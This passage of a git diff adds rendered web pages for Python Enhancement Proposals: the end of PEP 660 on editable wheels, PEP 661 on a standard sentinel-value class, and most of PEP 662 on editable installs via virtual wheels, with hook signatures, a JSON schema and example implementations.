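        whl.writestr(f"__editable__.{project_name}.pth",
                     os.path.abspath(src_dir) + "\n")
        # A real backend must also write a compliant .dist-info directory
        # (METADATA, WHEEL, RECORD) as required by this specification.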
+
+

Frontend requirements

+

Frontends must install “editable” wheels in the same way as regular wheels. +This also means uninstallation of editables does not require any special treatment.

+

Frontends must create a direct_url.json file in the .dist-info +directory of the installed distribution, in compliance with PEP 610. The +url value must be a file:// url pointing to the project directory +(i.e. the directory containing pyproject.toml), and the dir_info value +must be {'editable': true}.

+

Frontends must execute get_requires_for_build_editable hooks in +an environment which contains the bootstrap requirements specified in the +pyproject.toml file.

+

Frontends must execute the prepare_metadata_for_build_editable and +build_editable hooks in an environment which contains the bootstrap +requirements from pyproject.toml and those specified by the +get_requires_for_build_editable hook.

+

Frontends must not expose the wheel obtained from build_editable +to end users. The wheel must be discarded after installation and must not be +cached nor distributed.

+
+
+
+

Limitations

+

With regard to the wheel .data directory, this PEP focuses on making the +purelib and platlib categories (installed into site-packages) +“editable”. It does not make special provision for the other categories such as +headers, data and scripts. Package authors are encouraged to use +console_scripts, make their scripts tiny wrappers around library +functionality, or manage these from the source checkout during development.

+
+
+

Prototypes

+

At the time of writing this PEP, several prototype implementations are +available in various frontends and backends. We provide links below to +illustrate possible approaches.

+

Frontends:

+ +

Build backends:

+ +
+
+

Rejected ideas

+
+

editable local version identifier

+

The idea of having build backends append to or modify the local version identifier to include the editable string has been rejected because it would not satisfy == version specifiers that include the local version identifier. In other words, pkg==1.0+local is not satisfied by version 1.0+local.editable.

+
+
+

Virtual wheel

+

Another approach was proposed in PEP 662, where +the build backend returns a mapping from source files and directories to the +installed layout. It is then up to the installer frontend to realize the +editable installation by whatever means it deems adequate for its users.

+

In terms of capabilities, both proposals provide the core “editable” feature.

+

The key difference is that PEP 662 leaves it to the frontend to decide how the +editable installation will be realized, while with this PEP, the choice must be +made by the backend. Both approaches can in principle provide several editable +installation methods for a given project, and let the developer choose one at +install time.

+

At the time of writing this PEP, it is clear that the community has a wide +range of theoretical and practical expectations about editable installs. The +reality is that the only one there is wide experience with is path insertion +via .pth (i.e. what setup.py develop does).

+

We believe that PEP 660 better addresses these “unknown unknowns” today in the +most reliable way, by letting project authors select the backend or implement +the method that provides the editable mechanism that best suit their +requirements, and test it works correctly. Since the frontend has no latitude +in how to install the “editable” wheel, in case of issue, there is only one +place to investigate: the build backend.

+

With PEP 662, issues need to be investigated in the frontend, the backend and possibly the specification. There is also a high probability that different frontends, implementing the specification in different ways, will produce installations that behave differently than project authors intended, creating confusion, or worse, projects that only work with specific frontends or IDEs.

+
+
+

Unpacked wheel

+

A prototype was made that +created an unpacked wheel in a temporary directory, to be copied to the target +environment by the frontend. This approach was not pursued because a wheel +archive is easy to create for the backend, and using a wheel as communication +mechanism is a better fit with the PEP 517 philosophy, and therefore keeps +things simpler for the frontend.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0660.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0661/index.html b/pep-0661/index.html
new file mode 100644
index 00000000000..d8b0aa193c8
--- /dev/null
+++ b/pep-0661/index.html
@@ -0,0 +1,613 @@
+PEP 661 – Sentinel Values | peps.python.org
+
+


+ + +
+
+
+

PEP 661 – Sentinel Values

+
+
Author:
+
Tal Einat <tal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
06-Jun-2021
+
Post-History:
+
20-May-2021, 06-Jun-2021
+
+
+
+
+

TL;DR: See the Specification and Reference Implementation.

+
+

Abstract

+

Unique placeholder values, commonly known as “sentinel values”, are common in +programming. They have many uses, such as for:

+
    +
  • Default values for function arguments, for when a value was not given:
    def foo(value=None):
    +    ...
    +
    +
    +
  • +
  • Return values from functions when something is not found or unavailable:
    >>> "abc".find("d")
    +-1
    +
    +
    +
  • +
  • Missing data, such as NULL in relational databases or “N/A” (“not +available”) in spreadsheets
  • +
+

Python has the special value None, which is intended to be used as such +a sentinel value in most cases. However, sometimes an alternative sentinel +value is needed, usually when it needs to be distinct from None since +None is a valid value in that context. Such cases are common enough that +several idioms for implementing such sentinels have arisen over the years, but +uncommon enough that there hasn’t been a clear need for standardization. +However, the common implementations, including some in the stdlib, suffer from +several significant drawbacks.

+

This PEP proposes adding a utility for defining sentinel values, to be used +in the stdlib and made publicly available as part of the stdlib.

+

Note: Changing all existing sentinels in the stdlib to be implemented this +way is not deemed necessary, and whether to do so is left to the discretion +of the maintainers.

+
+
+

Motivation

+

In May 2021, a question was brought up on the python-dev mailing list +[1] about how to better implement a sentinel value for +traceback.print_exception. The existing implementation used the +following common idiom:

+
_sentinel = object()
+
+
+

However, this object has an uninformative and overly verbose repr, causing the +function’s signature to be overly long and hard to read:

+
>>> help(traceback.print_exception)
+Help on function print_exception in module traceback:
+
+print_exception(exc, /, value=<object object at
+0x000002825DF09650>, tb=<object object at 0x000002825DF09650>,
+limit=None, file=None, chain=True)
+
+
+

Additionally, two other drawbacks of many existing sentinels were brought up +in the discussion:

+
    +
  1. Some do not have a distinct type, hence it is impossible to define clear +type signatures for functions with such sentinels as default values.
  2. +
3. They behave unexpectedly after being copied or unpickled, due to a separate instance being created and thus comparisons using is failing (see the demonstration after this list).
  4. +
+
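The second drawback is easy to demonstrate (a minimal sketch):

import copy
import pickle

_sentinel = object()

# Both copying and round-tripping through pickle create new, distinct
# instances, so identity comparisons silently fail.
assert copy.copy(_sentinel) is not _sentinel
assert pickle.loads(pickle.dumps(_sentinel)) is not _sentinel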

In the ensuing discussion, Victor Stinner supplied a list of currently used +sentinel values in the Python standard library [2]. This showed that the +need for sentinels is fairly common, that there are various implementation +methods used even within the stdlib, and that many of these suffer from at +least one of the three above drawbacks.

+

The discussion did not lead to any clear consensus on whether a standard +implementation method is needed or desirable, whether the drawbacks mentioned +are significant, nor which kind of implementation would be good. The author +of this PEP created an issue on bugs.python.org (now a GitHub issue [3]) +suggesting options for improvement, but that focused on only a single +problematic aspect of a few cases, and failed to gather any support.

+

A poll [4] was created on discuss.python.org to get a clearer sense of the community’s opinions. After nearly two weeks, significant further discussion, and 39 votes, the poll’s results were not conclusive. 40% had voted for “The status-quo is fine / there’s no need for consistency in this”, but most voters had voted for one or more standardized solutions. Specifically, 37% of the voters chose “Consistent use of a new, dedicated sentinel factory / class / meta-class, also made publicly available in the stdlib”.

+

With such mixed opinions, this PEP was created to facilitate making a decision +on the subject.

+

While working on this PEP, iterating on various options and implementations +and continuing discussions, the author has come to the opinion that a simple, +good implementation available in the standard library would be worth having, +both for use in the standard library itself and elsewhere.

+
+
+

Rationale

+

The criteria guiding the chosen implementation were:

+
    +
  1. The sentinel objects should behave as expected by a sentinel object: When +compared using the is operator, it should always be considered +identical to itself but never to any other object.
  2. +
  3. Creating a sentinel object should be a simple, straightforward one-liner.
  4. +
  5. It should be simple to define as many distinct sentinel values as needed.
  6. +
  7. The sentinel objects should have a clear and short repr.
  8. +
  9. It should be possible to use clear type signatures for sentinels.
  10. +
  11. The sentinel objects should behave correctly after copying and/or +unpickling.
  12. +
  13. Such sentinels should work when using CPython 3.x and PyPy3, and ideally +also with other implementations of Python.
  14. +
  15. As simple and straightforward as possible, in implementation and especially +in use. Avoid this becoming one more special thing to learn when learning +Python. It should be easy to find and use when needed, and obvious enough +when reading code that one would normally not feel a need to look up its +documentation.
  16. +
+

With so many uses in the Python standard library [2], it would be useful to +have an implementation in the standard library, since the stdlib cannot use +implementations of sentinel objects available elsewhere (such as the +sentinels [5] or sentinel [6] PyPI packages).

+

After researching existing idioms and implementations, and going through many +different possible implementations, an implementation was written which meets +all of these criteria (see Reference Implementation).

+
+
+

Specification

+

A new Sentinel class will be added to a new sentinels module. +Its initializer will accept a single required argument, the name of the +sentinel object, and three optional arguments: the repr of the object, its +boolean value, and the name of its module:

+
>>> from sentinels import Sentinel
+>>> NotGiven = Sentinel('NotGiven')
+>>> NotGiven
+<NotGiven>
+>>> MISSING = Sentinel('MISSING', repr='mymodule.MISSING')
+>>> MISSING
+mymodule.MISSING
+>>> MEGA = Sentinel('MEGA',
+...                 repr='<MEGA>',
+...                 bool_value=False,
+...                 module_name='mymodule')
+>>> MEGA
+<MEGA>
+
+
+

Checking if a value is such a sentinel should be done using the is +operator, as is recommended for None. Equality checks using == will +also work as expected, returning True only when the object is compared +with itself. Identity checks such as if value is MISSING: should usually +be used rather than boolean checks such as if value: or if not value:.

+

Sentinel instances are truthy by default, unlike None. This parallels the +default for arbitrary classes, as well as the boolean value of Ellipsis.

+

The names of sentinels are unique within each module. When calling +Sentinel() in a module where a sentinel with that name was already +defined, the existing sentinel with that name will be returned. Sentinels +with the same name in different modules will be distinct from each other.

+

Creating a copy of a sentinel object, such as by using copy.copy() or by +pickling and unpickling, will return the same object.

+

The module_name optional argument should normally not need to be supplied, +as Sentinel() will usually be able to recognize the module in which it was +called. module_name should be supplied only in unusual cases when this +automatic recognition does not work as intended, such as perhaps when using +Jython or IronPython. This parallels the designs of Enum and +namedtuple. For more details, see PEP 435.

+

The Sentinel class may not be sub-classed, to avoid overly-clever uses +based on it, such as attempts to use it as a base for implementing singletons. +It is considered important that the addition of Sentinel to the stdlib should +add minimal complexity.

+

Ordering comparisons are undefined for sentinel objects.

+
+

Typing

+

To make usage of sentinels clear and simple in typed Python code, we propose to +amend the type system with a special case for sentinel objects.

+

Sentinel objects may be used in +type expressions, representing themselves. +This is similar to how None is handled in the existing type system. For +example:

+
from sentinels import Sentinel
+
+MISSING = Sentinel('MISSING')
+
+def foo(value: int | MISSING = MISSING) -> int:
+    ...
+
+
+

More formally, type checkers should recognize sentinel creations of the form +NAME = Sentinel('NAME') as creating a new sentinel object. If the name +passed to the Sentinel constructor does not match the name the object is +assigned to, type checkers should emit an error.

+

Sentinels defined using this syntax may be used in +type expressions. They +represent a fully static type that has a +single member, the sentinel object itself.

+

Type checkers should support narrowing union types involving sentinels +using the is and is not operators:

+
from sentinels import Sentinel
+from typing import assert_type
+
+MISSING = Sentinel('MISSING')
+
+def foo(value: int | MISSING) -> None:
+    if value is MISSING:
+        assert_type(value, MISSING)
+    else:
+        assert_type(value, int)
+
+
+

To support usage in type expressions, the runtime implementation +of the Sentinel class should have the __or__ and __ror__ +methods, returning typing.Union objects.

+
+
+
+

Backwards Compatibility

+

While not breaking existing code, adding a new “sentinels” stdlib module could +cause some confusion with regard to existing modules named “sentinels”, and +specifically with the “sentinels” package on PyPI.

+

The existing “sentinels” package on PyPI [10] appears to be abandoned, with +the latest release being made on Aug. 2016. Therefore, using this name for a +new stdlib module seems reasonable.

+

If and when this PEP is accepted, it may be worth verifying if this has indeed +been abandoned, and if so asking to transfer ownership to the CPython +maintainers to reduce the potential for confusion with the new stdlib module.

+
+
+

How to Teach This

+

The normal types of documentation of new stdlib modules and features, namely +doc-strings, module docs and a section in “What’s New”, should suffice.

+
+
+

Security Implications

+

This proposal should have no security implications.

+
+
+

Reference Implementation

+

The reference implementation is found in a dedicated GitHub repo [7]. A +simplified version follows:

+
import sys
+
+_registry = {}
+
+class Sentinel:
+    """Unique sentinel values."""
+
+    def __new__(cls, name, repr=None, bool_value=True, module_name=None):
+        name = str(name)
+        repr = str(repr) if repr else f'<{name.split(".")[-1]}>'
+        bool_value = bool(bool_value)
+        if module_name is None:
+            try:
+                module_name = \
+                    sys._getframe(1).f_globals.get('__name__', '__main__')
+            except (AttributeError, ValueError):
+                module_name = __name__
+
+        registry_key = f'{module_name}-{name}'
+
+        sentinel = _registry.get(registry_key, None)
+        if sentinel is not None:
+            return sentinel
+
+        sentinel = super().__new__(cls)
+        sentinel._name = name
+        sentinel._repr = repr
+        sentinel._bool_value = bool_value
+        sentinel._module_name = module_name
+
+        return _registry.setdefault(registry_key, sentinel)
+
+    def __repr__(self):
+        return self._repr
+
+    def __bool__(self):
+        return self._bool_value
+
+    def __reduce__(self):
+        return (
+            self.__class__,
+            (
+                self._name,
+                self._repr,
+                self._bool_value,   # keep the constructor argument order
+                self._module_name,
+            ),
+        )
+
+
+
+
+

Rejected Ideas

+
+

Use NotGiven = object()

+

This suffers from all of the drawbacks mentioned in the Rationale section.

+
+
+

Add a single new sentinel value, such as MISSING or Sentinel

+

Since such a value could be used for various things in various places, one +could not always be confident that it would never be a valid value in some use +cases. On the other hand, a dedicated and distinct sentinel value can be used +with confidence without needing to consider potential edge-cases.

+

Additionally, it is useful to be able to provide a meaningful name and repr +for a sentinel value, specific to the context where it is used.

+

Finally, this was a very unpopular option in the poll [4], receiving only 12% of the votes.

+
+
+

Use the existing Ellipsis sentinel value

+

This is not the original intended use of Ellipsis, though it has become +increasingly common to use it to define empty class or function blocks instead +of using pass.

+

Also, similar to a potential new single sentinel value, Ellipsis can’t be +as confidently used in all cases, unlike a dedicated, distinct value.

+
+
+

Use a single-valued enum

+

The suggested idiom is:

+
class NotGivenType(Enum):
+    NotGiven = 'NotGiven'
+NotGiven = NotGivenType.NotGiven
+
+
+

Besides the excessive repetition, the repr is overly long: +<NotGivenType.NotGiven: 'NotGiven'>. A shorter repr can be defined, at +the expense of a bit more code and yet more repetition.
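For example, one way to shorten the repr (a sketch, not taken from the PEP) is to override __repr__ on the enum class, at the cost of the extra code and repetition mentioned above:

from enum import Enum

class NotGivenType(Enum):
    NotGiven = 'NotGiven'

    def __repr__(self):
        return '<NotGiven>'

NotGiven = NotGivenType.NotGiven
print(repr(NotGiven))  # <NotGiven>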

+

Finally, this option was the least popular among the nine options in the +poll [4], being the only option to receive no votes.

+
+
+

A sentinel class decorator

+

The suggested idiom is:

+
@sentinel(repr='<NotGiven>')
+class NotGivenType: pass
+NotGiven = NotGivenType()
+
+
+

While this allows for a very simple and clear implementation of the decorator, +the idiom is too verbose, repetitive, and difficult to remember.

+
+
+

Using class objects

+

Since classes are inherently singletons, using a class as a sentinel value +makes sense and allows for a simple implementation.

+

The simplest version of this is:

+
class NotGiven: pass
+
+
+

To have a clear repr, one would need to use a meta-class:

+
class NotGiven(metaclass=SentinelMeta): pass
+
+
+

… or a class decorator:

+
@Sentinel
+class NotGiven: pass
+
+
+

Using classes this way is unusual and could be confusing. The intention of +code would be hard to understand without comments. It would also cause +such sentinels to have some unexpected and undesirable behavior, such as +being callable.
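For illustration, here is a hypothetical SentinelMeta along the lines sketched above (the name and details are assumptions); note that the resulting “sentinel” is still a class, and therefore callable:

class SentinelMeta(type):
    def __repr__(cls):
        return f'<{cls.__name__}>'

class NotGiven(metaclass=SentinelMeta):
    pass

print(repr(NotGiven))  # <NotGiven>
NotGiven()             # unexpectedly valid: classes are callable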

+
+ +
+
+

Additional Notes

+
    +
  • This PEP and the initial implementation are drafted in a dedicated GitHub +repo [7].
  • +
  • For sentinels defined in a class scope, to avoid potential name clashes, +one should use the fully-qualified name of the variable in the module. Only +the part of the name after the last period will be used for the default +repr. For example:
    >>> class MyClass:
+...    NotGiven = Sentinel('MyClass.NotGiven')
    +>>> MyClass.NotGiven
    +<NotGiven>
    +
    +
    +
  • +
  • One should be careful when creating sentinels in a function or method, since +sentinels with the same name created by code in the same module will be +identical. If distinct sentinel objects are needed, make sure to use +distinct names.
  • +
  • There is no single desirable value for the “truthiness” of sentinels, i.e. +their boolean value. It is sometimes useful for the boolean value to be +True, and sometimes False. Of the built-in sentinels in Python, +None evaluates to False, while Ellipsis (a.k.a. ...) +evaluates to True. The desire for this to be set as needed came up in +discussions as well.
  • +
• The boolean value of NotImplemented is True, but using it in a boolean context has been deprecated since Python 3.9 (doing so generates a deprecation warning). This deprecation is due to issues specific to NotImplemented, as described in bpo-35712 [8].
  • +
  • To define multiple, related sentinel values, possibly with a defined +ordering among them, one should instead use Enum or something similar.
  • +
  • There was a discussion on the typing-sig mailing list [9] about the typing +for these sentinels, where different options were discussed.
  • +
+
+
+

Open Issues

+
    +
  • Is adding a new stdlib module the right way to go? I could not find any +existing module which seems like a logical place for this. However, adding +new stdlib modules should be done judiciously, so perhaps choosing an +existing module would be preferable even if it is not a perfect fit?
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0661.rst

+

Last modified: 2024-10-19 14:29:26 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0662/index.html b/pep-0662/index.html new file mode 100644 index 00000000000..224d1c7fdcc --- /dev/null +++ b/pep-0662/index.html +PEP 662 – Editable installs via virtual wheels | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 662 – Editable installs via virtual wheels

+
+
Author:
+
Bernát Gábor <gaborjbernat at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
28-May-2021
+
Post-History:
+

+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes extensions to the build backend and frontend +communication (as introduced by PEP 517) to allow projects to be installed in +editable mode by introducing virtual wheels.

+
+
+

Motivation

+

During development, many Python users prefer to install their libraries so that +changes to the underlying source code and resources are automatically reflected +in subsequent interpreter invocations without an additional installation step. +This mode is usually called “development mode” or “editable installs”. +Currently, there is no standardized way to accomplish this, as it was explicitly +left out of PEP 517 due to the complexity of the actual observed behaviors.

+

At the moment, users achieve this behaviour by one of the following:

+
    +
• For just Python code, by adding the relevant source directories to sys.path (configurable from the command line via the PYTHONPATH environment variable). Note that in this case, the users have to install the project dependencies themselves, and entry points or project metadata are not generated.
  • +
• setuptools provides the setup.py develop mechanism, which installs a pth file that injects the project root onto sys.path at interpreter startup time, generates the project metadata, and also installs project dependencies. pip exposes calling this mechanism via the pip install -e command-line interface.
  • +
• flit provides the flit install --symlink command that symlinks the project files into the interpreter's purelib folder, generates the project metadata, and also installs dependencies. Note, this allows supporting resource files too.
  • +
+

As these examples show, an editable install can be achieved in multiple ways, and at the moment there's no standard way of doing it. Furthermore, it's not clear whose responsibility it is to achieve and define what an editable installation is:

+
    +
1. allow the build backend to define and materialize it,
2. allow the build frontend to define and materialize it,
3. explicitly define and standardize one method from the possible options.
+

The author of this PEP believes there's no one-size-fits-all solution here; each method of achieving the editable effect has its pros and cons. Therefore this PEP rejects option three, as it's unlikely the community would agree on a single solution. Furthermore, the question remains whether the frontend or the build backend should own this responsibility. PEP 660 proposes that the build backend own this, while the current PEP proposes primarily the frontend, but still allows the backend to take control if it wants to do so.

+
+
+

Rationale

+

PEP 517 deferred “editable installs” because this would have further delayed its adoption, and there wasn't an agreement on how editable installs should be achieved. Due to the popularity of the setuptools and pip projects, the status quo prevailed: the backend could achieve editable mode by providing a setup.py develop implementation, which the user could trigger via pip install -e. By defining an editable interface between the build backend and frontend, we can eliminate the setup.py file and that non-standard communication method.

+
+
+

Terminology and goals

+

This PEP aims to delineate the frontend and the backend roles clearly and give +the developers of each the maximum ability to provide valuable features to +their users. In this proposal, the backend’s role is to prepare the project for +an editable installation, and then provide enough information to the frontend +so that the frontend can manifest and enforce the editable installation.

+

The information the backend provides to the frontend is a wheel that follows the existing specification within PEP 427. The wheel metadata about the archive itself ({distribution}-{version}.dist-info/WHEEL) must also contain the key Editable with a value of true.

+

However, instead of providing the project files within the wheel, it must +provide an editable.json file (at the root level of the wheel) that defines +the files to be exposed by the frontend. The content of this file is formulated +as a mapping of absolute source tree paths to relative target interpreter +destination paths within a scheme mapping.

+

A wheel that satisfies the previous two paragraphs is a virtual wheel. The frontend's role is to take the virtual wheel and install the project in editable mode. The way it achieves this is entirely up to the frontend and is considered an implementation detail.

+

The editable installation mode implies that the source code of the project +being installed is available in a local directory. Once the project is +installed in editable mode, some changes to the project code in the local +source tree will become effective without the need for a new installation step. +At a minimum, changes to the text of non-generated files that existed at the +installation time should be reflected upon the subsequent import of the +package.

+

Some kinds of changes, such as adding or modifying entry points or new +dependencies, require a new installation step to become effective. These changes +are typically made in build backend configuration files (such as +pyproject.toml). This requirement is consistent with the general user +expectation that such modifications will only become effective after +re-installation.

+

While users expect editable installations to behave identically to standard +installations, this may not always be possible and may be in tension with other +user expectations. Depending on how a frontend implements the editable mode, +some differences may be visible, such as the presence of additional files +(compared to a typical installation), either in the source tree or the +interpreter’s installation path.

+

Frontends should seek to minimize differences between the behavior of editable +and standard installations and document known differences.

+

For reference, a non-editable installation works as follows:

+
    +
1. The developer is using a tool, we'll call it here the frontend, to drive the project development (e.g., pip). When the user wants to trigger a package build and installation of a project, they'll communicate with the frontend.
2. The frontend uses a build frontend to trigger the build of a wheel (e.g., build). The build frontend uses PEP 517 to communicate with the build backend (e.g. setuptools) - with the build backend installed into a PEP 518 environment. Once invoked, the backend returns a wheel.
3. The frontend takes the wheel and feeds it to an installer (e.g., installer) to install the wheel into the target Python interpreter.
+
+
+

The Mechanism

+

This PEP adds two optional hooks to the PEP 517 backend interface. One of the hooks is used to specify the build dependencies of an editable install. The other hook returns, via the build frontend, the information the frontend needs to create an editable install.

+
+

get_requires_for_build_editable

+
def get_requires_for_build_editable(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional sequence of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file. The frontend must ensure that these dependencies are +available in the build environment in which the build_editable hook is +called.

+

If not defined, the default implementation is equivalent to returning [].
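As an illustration, a backend whose editable builds need an extra helper in the build environment might implement the hook as follows (the dependency shown is an assumption, not mandated by this PEP):

def get_requires_for_build_editable(config_settings=None):
    # This sketch assumes the backend wants the third-party
    # "editables" helper available when build_editable runs.
    return ["editables>=0.3"]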

+
+
+

prepare_metadata_for_build_editable

+
def prepare_metadata_for_build_editable(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_editable and look at the resulting +metadata directly.

+
+
+

build_editable

+
def build_editable(self, wheel_directory, config_settings=None,
+                    metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. It +must return the basename (not the full path) of the .whl file it creates, +as a unicode string. The wheel file must be of type virtual wheel as defined +under the terminology section.

+

If the build frontend has previously called prepare_metadata_for_build_editable +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_editable MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_editable, +including any unrecognized files it created.

+

Backends which do not provide the prepare_metadata_for_build_editable hook may +either silently ignore the metadata_directory parameter to build_editable, +or else raise an exception when it is set to anything other than None.

+

The source directory may be read-only; in such cases the backend may raise an error that the frontend can display to the user. The backend may store intermediate artifacts in cache locations or temporary directories. The presence or absence of any caches should not make a material difference to the final result of the build.

+

The content of the editable.json MUST validate against the following JSON schema:

+
{
+  "$schema": "http://json-schema.org/draft-07/schema",
+  "$id": "http://pypa.io/editables.json",
+  "type": "object",
+  "title": "Virtual wheel editable schema.",
+  "required": ["version", "scheme"],
+  "properties": {
+    "version": {
+      "$id": "#/properties/version",
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 1,
+      "title": "The version of the schema."
+    },
+    "scheme": {
+      "$id": "#/properties/scheme",
+      "type": "object",
+      "title": "Files to expose.",
+      "required": ["purelib", "platlib", "data", "headers", "scripts"],
+      "properties": {
+        "purelib": { "$ref": "#/$defs/mapping" },
+        "platlib": { "$ref": "#/$defs/mapping" },
+        "data": { "$ref": "#/$defs/mapping" },
+        "headers": { "$ref": "#/$defs/mapping" },
+        "scripts": { "$ref": "#/$defs/mapping" }
+      },
+      "additionalProperties": true
+    }
+  },
+  "additionalProperties": true,
+  "$defs": {
+    "mapping": {
+      "type": "object",
+      "description": "A mapping of source to target paths. The source is absolute path, the destination is relative path.",
+      "additionalProperties": true
+    }
+  }
+}
+
+
+

For example:

+
{
+   "version": 1,
+   "scheme": {
+      "purelib": {"/src/tree/a.py": "tree/a.py"},
+      "platlib": {},
+      "data": {"/src/tree/py.typed": "tree/py.typed"},
+      "headers": {},
+      "scripts": {}
+   }
+}
+
+
+
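For illustration, a locker or frontend could check a generated editable.json against the schema with the third-party jsonschema package (the file names here are assumptions):

import json
from jsonschema import validate  # pip install jsonschema

with open("editable.schema.json") as f:  # the schema shown above
    schema = json.load(f)
with open("editable.json") as f:
    document = json.load(f)

validate(instance=document, schema=schema)  # raises ValidationError on failure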

The scheme paths map from project source absolute paths to target directory +relative paths. We allow backends to change the project layout from the project +source directory to what the interpreter will see by using the mapping.

+

For example, if the backend returns "purelib": {"/me/project/src": ""}, this would mean exposing all files and modules within /me/project/src at the root of the purelib path within the target interpreter.

+
+
+

Build frontend requirements

+

The build frontend is responsible for setting up the environment for the build backend to generate the virtual wheel. All recommendations from PEP 517 for the build wheel hook apply here too.

+
+
+

Frontend requirements

+

The frontend must install the virtual wheel exactly as defined within PEP 427. Furthermore, it is responsible for also installing the files defined within the editable.json file. The manner in which it does so is left up to the frontend, and the frontend is encouraged to communicate to the user exactly the method chosen, and what limitations that solution will have.

+

The frontend must create a direct_url.json file in the .dist-info +directory of the installed distribution, in compliance with PEP 610. The url +value must be a file:// URL pointing to the project directory (i.e., the +directory containing pyproject.toml), and the dir_info value must be +{'editable': true}.
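A rough sketch of a frontend writing that file, with all paths illustrative:

import json
import pathlib

project_dir = pathlib.Path("/me/project").resolve()
direct_url = {
    "url": project_dir.as_uri(),  # e.g. file:///me/project
    "dir_info": {"editable": True},
}
dist_info = pathlib.Path("site-packages/project-1.0.dist-info")
dist_info.mkdir(parents=True, exist_ok=True)
(dist_info / "direct_url.json").write_text(json.dumps(direct_url))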

+

The frontend can rely on the prepare_metadata_for_build_editable hook when +installing in editable mode.

+

If the frontend concludes it cannot achieve an editable installation with the +information provided by the build backend it should fail and raise an error to +clarify to the user why not.

+

The frontend might implement one or more editable installation mechanisms and can leave it up to the user to choose the one that is optimal for their use case. For example, pip could add an editable mode flag, and allow the user to choose between pth files or symlinks (pip install -e . --editable-mode=pth vs pip install -e . --editable-mode=symlink).

+
+
+

Example editable implementations

+

To show how this PEP might be used, we'll now present a few case studies. Note the offered solutions are purely for illustration purposes and are not normative for the frontend/backend.

+
+

Add the source tree as is to the interpreter

+

This is one of the simplest implementations: it will add the source tree as is into the interpreter's scheme paths. The editable.json within the virtual wheel might look like:

+
{"version": 1, "scheme": {"purelib": {"<project dir>": "<project dir>"}}}
+
+
+

The frontend then could either:

+
    +
• Add the source directory onto the target interpreter's sys.path at startup. This is done by creating a pth file in the target interpreter's purelib folder; setuptools does this today, and it is what pip install -e translates to (a rough sketch follows this list). This solution is fast and cross-platform compatible. However, this puts the entire source tree onto the system, potentially exposing modules that would not be available in a standard installation case.
  • +
• Symlink the folder, or the individual files within it. This method is what flit does via its flit install --symlink. This solution requires the current platform to support symlinks. Still, it potentially allows symlinking individual files, which could address the problem of the source tree containing files that should be excluded from the installation.
  • +
+
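As a rough sketch of the pth-based approach (the file name and path are illustrative):

import pathlib
import sysconfig

# Locate the target interpreter's purelib directory and drop a .pth
# file there; its contents are added to sys.path at startup.
purelib = pathlib.Path(sysconfig.get_paths()["purelib"])
pth = purelib / "_my_project_editable.pth"
pth.write_text("/me/project/src\n")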
+
+

Using custom importers

+

For a more robust and more dynamic collaboration between the build backend and +the target interpreter, we can take advantage of the import system allowing the +registration of custom importers. See PEP 302 for more details and editables +as an example of this. The backend can generate a new importer during the +editable build (or install it as an additional dependency) and register it at +interpreter startup by adding a pth file.

+
{
  "version": 1,
  "scheme": {
    "purelib": {
      "<project dir>/.editable/_register_importer.pth": "<project dir>/_register_importer.pth",
      "<project dir>/.editable/_editable_importer.py": "<project dir>/_editable_importer.py"
    }
  }
}
+
+
+

The backend here registers a hook that is called whenever a new module is imported, allowing dynamic and on-demand functionality. Potential use cases where this is useful (a rough sketch of such an importer follows the list):

+
    +
• Expose a source folder, but honor module excludes: the backend may generate an import hook that consults the exclusion table before allowing a source file loader to discover a file in the source directory.
  • +
  • For a project, let there be two modules, A.py and B.py. These are two +separate files in the source directory; however, while building a wheel, they +are merged into one mega file project.py. In this case, with this PEP, +the backend could generate an import hook that reads the source files at +import time and merges them in memory before materializing it as a module.
  • +
• Automatically update out-of-date C-extensions: the backend may generate an import hook that checks the last-modified timestamp of a C-extension source file. If it is newer than that of the current C-extension binary, trigger a rebuild by calling the compiler before import.
  • +
+
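To make the first use case concrete, here is a rough, non-normative sketch of what a generated _editable_importer.py could look like; every name and path below is an assumption:

import importlib.abc
import importlib.util
import os
import sys

class EditableFinder(importlib.abc.MetaPathFinder):
    """Resolve imports against the project source tree on demand."""

    def __init__(self, source_root, excludes=frozenset()):
        self.source_root = source_root
        self.excludes = excludes

    def find_spec(self, fullname, path=None, target=None):
        if fullname in self.excludes:  # honor module excludes
            return None
        candidate = os.path.join(self.source_root, *fullname.split('.')) + '.py'
        if os.path.exists(candidate):
            return importlib.util.spec_from_file_location(fullname, candidate)
        return None  # defer to the normal import machinery

def install(source_root='/me/project/src'):
    # The generated _register_importer.pth would contain a single line:
    #     import _editable_importer; _editable_importer.install()
    sys.meta_path.insert(0, EditableFinder(source_root))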
+
+
+
+

Rejected ideas

+

